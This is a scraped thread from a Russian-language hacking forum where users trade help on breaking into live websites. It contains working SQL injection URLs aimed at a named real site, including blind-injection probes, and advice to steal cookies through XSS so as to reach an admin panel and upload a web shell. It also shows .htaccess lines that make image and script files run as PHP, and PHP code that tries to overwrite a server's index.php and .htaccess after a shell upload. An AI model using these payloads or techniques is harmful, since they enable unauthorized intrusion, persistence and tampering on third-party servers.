Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. MaxFast

    MaxFast Elder - Старейшина

    Joined:
    12 Oct 2011
    Messages:
    580
    Likes Received:
    148
    Reputations:
    94
    Как обойти редирект на index.php при MySQL ошибке?
    Выключение редиректа в браузере не помогает.
     
  2. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,417
    Likes Received:
    815
    Reputations:
    848
    Смотря какая ситуация, если редиректит при sql-иньекции то может редиректить на вывод или тру результат, обьесни конкретную ситуацию...
     
    _________________________
  3. VY_CMa

    VY_CMa Green member

    Joined:
    6 Jan 2012
    Messages:
    911
    Likes Received:
    469
    Reputations:
    723
    90% что нужно использовать extravalue()
     
    _________________________
  4. MaxFast

    MaxFast Elder - Старейшина

    Joined:
    12 Oct 2011
    Messages:
    580
    Likes Received:
    148
    Reputations:
    94
    Вообщем есть сайт:

    Если изменить id на несуществующий - редирект на index.php.
    Так же если начать раскручивать инъецию происходит редирект, даже если все верно.
     
  5. BigBear

    BigBear Escrow Service
    Staff Member Гарант - Escrow Service

    Joined:
    4 Dec 2008
    Messages:
    1,778
    Likes Received:
    853
    Reputations:
    857
    Если версия Мускула < 5.1 то 0%

    В твоём случае редирект является индикатором правильности запроса. Так как у тебя инъекция в where строй правильную логику запроса.

    Например

    Code:
    http://www.igorkuljeric.com/news.php?kat_id=163+and+1=1    Нет редиректа
    
    http://www.igorkuljeric.com/news.php?kat_id=163+and+1=2    Есть редирект
    Да, и в твоём случае вывода нет.

    _ttp://www.igorkuljeric.com/news.php?kat_id=163+and+1=2+union+select+222

    Так что только через Blind-SQL injection

    _ttp://www.igorkuljeric.com/news.php?kat_id=163+and+substring((@@version),1,1)=5
     
    _________________________
  6. wanttoask

    wanttoask New Member

    Joined:
    30 Sep 2012
    Messages:
    81
    Likes Received:
    1
    Reputations:
    0
    есть сайт с xss уязвимостью. Можно через нее на сайт шэлл залить?
     
  7. MaxFast

    MaxFast Elder - Старейшина

    Joined:
    12 Oct 2011
    Messages:
    580
    Likes Received:
    148
    Reputations:
    94
    Воруй печенья, иди в админку, лей шелл.
     
  8. wanttoask

    wanttoask New Member

    Joined:
    30 Sep 2012
    Messages:
    81
    Likes Received:
    1
    Reputations:
    0
    А можно подробнее? я с xss пока не очень дружу.
     
  9. wanttoask

    wanttoask New Member

    Joined:
    30 Sep 2012
    Messages:
    81
    Likes Received:
    1
    Reputations:
    0
    киньте какую-нибудь статейку по xss
     
  10. qaz

    qaz Elder - Старейшина

    Joined:
    12 Jul 2010
    Messages:
    1,582
    Likes Received:
    173
    Reputations:
    75
    читай
    http://forum.antichat.ru/thread322832.html
     
  11. kingbeef

    kingbeef Reservists Of Antichat

    Joined:
    8 Apr 2010
    Messages:
    423
    Likes Received:
    165
    Reputations:
    126
    https://forum.antichat.ru/thread20140.html
     
    _________________________
  12. wanttoask

    wanttoask New Member

    Joined:
    30 Sep 2012
    Messages:
    81
    Likes Received:
    1
    Reputations:
    0
    У меня в браузере хсс не отображается(не показывает окошко алерт) но ie пишет: возможность межсайтового скриптинга заблокирована. Что сделать чтобы окошко изобразилось?
     
  13. wanttoask

    wanttoask New Member

    Joined:
    30 Sep 2012
    Messages:
    81
    Likes Received:
    1
    Reputations:
    0
    В хроме
     
  14. kingbeef

    kingbeef Reservists Of Antichat

    Joined:
    8 Apr 2010
    Messages:
    423
    Likes Received:
    165
    Reputations:
    126
    В хроме и ie>8 не работают пасивные из-за фильтров.
     
    _________________________
  15. wanttoask

    wanttoask New Member

    Joined:
    30 Sep 2012
    Messages:
    81
    Likes Received:
    1
    Reputations:
    0
    А можно их отключить?
     
  16. wanttoask

    wanttoask New Member

    Joined:
    30 Sep 2012
    Messages:
    81
    Likes Received:
    1
    Reputations:
    0
    Кому не жалко, скиньте какой нить сайт с SQL инъекцией.
     
  17. qaz

    qaz Elder - Старейшина

    Joined:
    12 Jul 2010
    Messages:
    1,582
    Likes Received:
    173
    Reputations:
    75
    да хоть милион http://forum.antichat.ru/thread21336.html
     
  18. qaz

    qaz Elder - Старейшина

    Joined:
    12 Jul 2010
    Messages:
    1,582
    Likes Received:
    173
    Reputations:
    75
    такая проблема, залил шелл через майскул, в .htaccess запрешено в этой деректории(картинки) использовать php, залил глебже в дерикторию .htaccess с содержимым
    AddType application/x-httpd-php .js AddHandler application/x-httpd-php .js
    AddType application/x-httpd-php .jpg AddHandler application/x-httpd-php .jpg

    в итоге файлы в форматах .jpg и .js выполняют php, после долгих мучений от того что ничего не получалось я додумался посмотреть phpinfo(); и увидел приичину моих бед allow_url_fopen Off что блин ешо можно придумать?
     
  19. попугай

    попугай Elder - Старейшина

    Joined:
    15 Jan 2008
    Messages:
    1,588
    Likes Received:
    405
    Reputations:
    196
    ты же говоришь, что твои шеллы с .js и .jpg расширением исполняются как php. В чем проблема то?
     
  20. qaz

    qaz Elder - Старейшина

    Joined:
    12 Jul 2010
    Messages:
    1,582
    Likes Received:
    173
    Reputations:
    75
    я не могу изменьть инфу в файлах которые находятся выше по каталогу

    например

    выполняю код

    PHP:
    $a file_get_contents("../.htaccess"); echo $a;
    показывает Deny from all

    далее выполняю код

    PHP:
    file_put_contents("../.htaccess","AddType application/x-httpd-php .js AddHandler application/x-httpd-php .js
     AddType application/x-httpd-php .jpg AddHandler application/x-httpd-php .jpg"
    ); 
    реакции ноль


    также

    PHP:
    file_put_contents("../../index.php","aaa"); 
    реакции ноль, правятся только те файлы что лежат в етом же каталоге
     
Loading...
Thread Status:
Not open for further replies.